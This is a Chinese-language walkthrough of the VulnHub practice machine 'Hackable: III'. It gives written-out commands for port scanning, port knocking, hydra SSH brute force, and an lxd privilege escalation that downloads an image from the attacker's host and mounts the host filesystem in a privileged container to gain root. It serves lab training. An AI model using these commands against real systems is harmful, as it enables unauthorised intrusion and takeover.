文章目录

  • 靶机介绍
  • 渗透过程
    • 准备
    • 获取IP
    • 端口扫描
    • 信息收集
      • 信息1
      • 信息2
      • 信息3
      • 信息4
      • 信息5
      • 信息6
      • 信息7
    • 端口碰撞
    • ssh登录
    • 提权

靶机介绍

下载地址: http://www.vulnhub.com/entry/hackable-iii,720/
难度:中等

渗透过程

准备

将靶机下载下来,我这里使用的是virtualbox,下载的是.ova文件。下载之后用virtualbox打开,设置网络为桥接模式。

获取IP

使用arp-scan工具,我们得到靶机的IP为:192.168.1.106。

arp-scan -l

端口扫描

nmap -A -T4 -p 1-65535 192.168.1.106

这里我们看到开放了两个端口:22和80。其中,22端口的状态是“filtered”。nmap在端口扫描的时候会判断一下端口的状态。

Filtered:由于报文无法到达指定的端口,nmap不能够决定端口的开放状态,这主要是由于网络或者主机安装了一些防火墙所导致的。当nmap收到icmp报文主机不可达报文(例如:type为3,code为13(communication administratively prohibit)报文)或者目标主机无应答,常常会将目标主机的状态设置为filtered。

信息收集

  1. 由于靶机开放了80端口,我们访问它的http服务,如下图所示,是一张图片。

    查看源代码,会发现两个信息:
信息1

账户登录网址:

打开这个网址,我们目前是没有账号和密码的信息的。

信息2

这里有一行注释:

"Please, jubiscleudo, don't forget to activate the port knocking when
exiting your section, and tell the boss not to forget to approve the .jpgfile - dev_suport@hackable3.com"

这里我们获得了一个名字jubiscleudo,然后提醒他不要忘记激活端口碰撞,并且要让这个网站支持jpg文件。

2. 接下来,我使用dirb对网站的目录进行了扫描。我们对扫描出的网址一一进行访问。

dirb http://192.168.1.106

信息3

http://192.168.1.106/backup网址下我们得到了一个wordlist.txt。我们把它保存下来,之后可能会用于暴力破解。

信息4

http://192.168.1.106/config/这个网址下是一个1.txt文件,里面是一段base64编码的乱码。通过解码我们的到一个端口10000。

信息5

http://192.168.1.106/css/网址下有2.txt文件,里面是用brainfuck编码的乱码,解码之后是4444.

信息6

我们也可以用dirb扫描特殊文件,根据信息2这里专门扫一下jpg文件,扫到了一个3.jpg。

我尝试用exiftool查看,没有发现信息。然后哦使用隐写工具查看得到端口65535

信息7

http://192.168.1.106/login.php网址查看源代码。这里是说用‘user’,'pass’登录信息1中的登录网址,会执行这个php脚本,查看源代码如下。

端口碰撞

从信息2中我们得知这个网站使用了端口碰撞技术,那么,我们可以尝试用端口碰撞打开22端口。

端口碰撞是一种通过在一组预先指定的关闭端口上产生连接请求,从外部打开防火墙上的端口的方法。一旦收到正确的连接请求序列,防火墙规则就会被动态修改,以允许发送连接请求的主机通过特定端口进行连接。

也就是说,攻击者可能通过端口扫面来利用一些端口服务来发动攻击,但是一些固定的端口又需要开放来满足远程维护需求,因此,我们可以使用端口碰撞技术来形成一个访问控制。

我们需要去碰撞一个特定的端口序列,才能够打开我们想要访问的端口。

这里,我们可以使用knock命令:

knock <IP> <PORT1> <PORT2> <PORT3> <PORT4> -v

那现在我们把信息4—6收集到端口号带进去。再次端口扫描,22端口为open状态。

knock 192.168.1.106 10000 4444 65535

ssh登录

我们有一个用户名,然后我们需要知道ssh的密码。使用hydra进行暴力破解,这里还要用到信息3中获取的字典。得到密码。

hydra -l jubiscleudo -P wordlist.txt 192.168.1.106 ssh


首先在jubiscleudo文件夹下收集信息,除了看到一个企鹅,领英的网址,没有收获。
这里我们看到有两个用户文件夹,尝试用hydra破解密码没破解出来,气哦。

在网站的backup_config.php中,我们得到hackable_3的密码。

切换用户:

提权

查看hackable_3的id。

当当前用户具有lxd权限时(通过id命令可以查看),可以通过创建任意镜像,并将当前系统根目录挂载到镜像mnt目录下,然后通过chroot命令即可获取当前系统的root权限。

  1. 首先在本地下载好镜像,然后生成tar包,传到靶机中。
git clone  https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine
python3 -m http.server 9000


2. 靶机段把tar包下载下来,然后加载到lxd中。

wget http://192.168.1.104:9000/alpine-v3.14-x86_64-20210831_0918.tar.gz
lxc image import ./alpine-v3.14-x86_64-20210831_0918.tar.gz
lxd init(一直回车就行)


这里lxc init后面跟的是image的Fingerprint。

lxc init 23d18b72258c ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=truelxc start ignitelxc exec ignite /bin/sh

然后我们就获得了root权限。

VulnHub靶机_HACKABLE: III相关推荐

  1. [网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)

    这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可 ...

  2. Vulnhub靶机系列:SecTalks: BNE0x03 - Simple

    这次的靶机是vulnhub靶机:SecTalks: BNE0x03 - Simple 文章目录 靶机地址及相关描述 靶机地址 靶机描述 Simple CTF Location Hints 靶机设置 利 ...

  3. 全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(七)IMF【包含了sql注入,文件上传,gif图片木马制作,缓冲区溢出漏洞sploit等诸多知识点的靶机,超多干货】

    靶机地址:https://www.vulnhub.com/entry/imf-1,162/ 靶机难度:中级(CTF) 靶机发布日期:2016年10月30日 靶机描述:欢迎使用" IMF&qu ...

  4. [网络安全自学篇] 七十五.Vulnhub靶机渗透之bulldog信息收集和nc反弹shell(三)

    这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步.前文分享了APT攻击检测溯源与常见APT组织的攻击案例,并介绍防御措施.这篇文章将讲 ...

  5. Vulnhub靶机DC系列-DC-8

    Vulnhub靶机DC系列-DC-8 靶场名称:DC-8 靶场地址:https://www.vulnhub.com/entry/dc-8,367/ 下载地址: DC-8.zip (Size: 379 ...

  6. Vulnhub靶机:EVILBOX_ ONE(很详细)

    目录 介绍 信息收集 主机发现 主机信息探测 网站探测 目录扫描 目录扫描字典 爆破页面参数 Burpsuite爆破参数 ffuf 补充:区分文件包含与文件读取 文件包含漏洞 文件包含.任意文件读取的 ...

  7. Vulnhub靶机渗透学习——DC-9

    本文仅个人学习所做笔记,仅供参考,有不足之处请指出! vulnhub靶机 vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试.提权. ...

  8. Vulnhub靶机Wakanda渗透测试攻略

    前言 Wakanda是一个新的交易市场网站,很快会上线了.你的目标是通过黑客技术找到"振金"的确切位置. 页首配图 本vulnhub靶机环境由xMagass开发,并托管于Vulnh ...

  9. VMware检测不到vulnhub靶机IP地址解决办法

    提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 vulnhub靶机检测不到IP地址解决办法 原因一:查看网络适配器是否为NAT模式 原因二:虚拟网络编辑器配置出错 原因三:靶机网卡配 ...

最新文章

  1. linux网络编程之socket(十一):套接字I/O超时设置方法和用select实现超时
  2. 解惑:为什么云计算和物联网会同时出现——微云网络
  3. UA PHYS515A 电磁理论III 静磁学问题2 标量势方法与向量势方法简介
  4. 视觉智能开放平台通过函数计算实现多人口罩佩戴识别
  5. 首尾非零正则_常用的17种正则表达式
  6. 转载--让搜索引擎优化(SEO)更有效 CSS+DIV标签命名规范
  7. TypeError系列之:TypeError: 'tuple' object is not callable.
  8. CentOS查询端口占用和清除端口占用的程序
  9. 《图形学》实验一:钻石图案
  10. 如何激活Microsoft Office 2010?
  11. Android Studio Error:Connection timed out: connect.解决方案
  12. 为什么至少三个哨兵_入职第一周,组长让我把部门redis服务搞成哨兵模式...慌-龙跃十二...
  13. 程序员玩连连看的正确姿势
  14. ora-12560:协议适配器错误
  15. 非常好用的354款Procreate新型笔刷
  16. Linux系统war包解压目录,linux系统下解压war包
  17. Simulink 搭建模型【MATLAB官网帮助】
  18. 无线WiFi怎样实现实名认证?
  19. html中背景条纹效果,使用CSS线性渐变 制作条纹背景
  20. Lake Counting S

热门文章

  1. matlab循环读取csv文件
  2. POI中导出Excel单元格样式(居中,字体,边框等)
  3. 看财经郎眼,深感数据挖掘意义重大
  4. Linux与Shell学习--shell系列11--流程控制4(until循环)
  5. BJ 集训测试3 problemA信仰圣光
  6. chown: changing ownership of ‘ypj’: Operation not permitted
  7. 安全之AAA服务器--路由器认证,授权,审计
  8. 高清晰渲染管线HDRP入门指南
  9. 中国经济发展新旧动能的转化
  10. 简单又漂亮:小白入门网页制作